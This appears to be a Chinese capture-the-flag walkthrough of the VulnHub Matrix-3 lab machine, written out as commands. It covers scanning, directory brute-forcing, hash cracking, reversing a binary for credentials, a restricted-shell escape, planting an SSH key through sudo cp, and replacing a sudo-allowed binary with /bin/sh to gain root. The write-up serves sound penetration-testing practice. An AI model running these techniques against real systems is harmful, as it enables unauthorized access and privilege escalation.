本周实践的是vulnhub的Matrix-3镜像,
下载地址,https://download.vulnhub.com/matrix/Machine_Matrix_v3.ova,
用virtualbox导入成功,
做地址扫描,sudo netdiscover -r 192.168.0.0/24,
获取到靶机地址是192.168.0.183,
接着做端口扫描,sudo nmap -sS -sV -T5 -A -p- 192.168.0.183,
发现靶机开了80端口的http服务,6464端口的ssh服务,
7331端口的caldav服务,
对http服务进行路径暴破,dirb http://192.168.0.183,
获取到http://192.168.0.183/assets,
浏览器访问http://192.168.0.183/assets,
获取到http://192.168.0.183/Matrix,
浏览器访问http://192.168.0.183/Matrix,获取到secret.gz,
下载wget http://192.168.0.183/Matrix/n/e/o/6/4/secret.gz,
查看文件类型,file secret.gz,查看文件内容cat secret.gz,
获取到admin:76a2173be6393254e72ffa4d6df1030a,
在线进行md5破解,获取到passwd,
浏览器访问http://192.168.0.183:7331,使用admin/passwd登录,
进行路径暴破,dirb http://192.168.0.183:7331 -u admin:passwd,
获取到http://192.168.0.183:7331/data,
继续访问并下载http://192.168.0.183:7331/data/data,
查看文件类型file data,是个windows的可执行文件,
安装sudo apt install ghidra,dump文件获取到guest:7R1n17yN30,
ssh登录,ssh [email protected] -p6464 -t "bash --noprofile"
sudo -l查看到(trinity) NOPASSWD: /bin/cp,
直接在靶机里制作ssh登录密钥,ssh-keygen,cd .ssh,
chmod 777 id_rsa.pub,cp id_rsa.pub /home/guest,cd ..,
sudo -u trinity /bin/cp id_rsa.pub /home/trinity/.ssh/authorized_keys,
用ssh密钥重新登录,ssh [email protected] -i id_rsa -p6464,
sudo -l查看到(root) NOPASSWD: /home/trinity/oracle,
在靶机上直接制作假的oracle文件,echo "/bin/sh" > oracle,
chmod 777 oracle,执行sudo ./oracle,id确认是root,
原文始发于微信公众号(云计算和网络安全技术实践):vulnhub之Matrix-3的实践
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论